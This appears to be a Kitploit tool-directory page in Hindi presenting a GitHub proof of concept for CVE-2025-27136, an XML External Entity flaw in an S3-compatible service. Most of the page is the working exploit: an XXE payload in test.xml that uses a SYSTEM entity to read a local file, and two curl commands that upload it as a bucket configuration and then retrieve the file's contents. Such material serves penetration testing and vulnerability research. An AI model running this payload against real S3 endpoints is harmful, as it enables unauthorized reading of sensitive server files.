Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-27136 — एक S3 में XML External Entity PoC. | Kitploit
उपकरण/GitHubGitHub/issaboudin/cve-2025-27136
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगक्लाउड सुरक्षा
GitHubissaboudin/cve-2025-27136

CVE-2025-27136

एक S3 में XML External Entity PoC.

रिपॉजिटरी देखें
136 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-27136

XML एक्सटर्नल एंटिटी (XXE) भेद्यता का शोषण।

संवेदनशील फ़ाइलें प्राप्त करने के लिए XML पेलोड का उपयोग करें (PoC)

test.xml

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///path/to/file">
]>
<CreateBucketConfiguration>
  <LocationConstraint>&xxe;</LocationConstraint>
</CreateBucketConfiguration>

बकेट में अपनी लोकल मशीन से test.xml अपलोड करने के लिए curl का उपयोग करें।

root@kitploit:~
curl -X PUT http://127.0.0.1:PORT/TB1 -H "Content-Type: application/xml" -d @test.xml

एक्सप्लॉइट ट्रिगर करें और फ़ाइल प्राप्त करें

root@kitploit:~
curl http://127.0.0.1:PORT/TB1?location
टूल डाउनलोड करें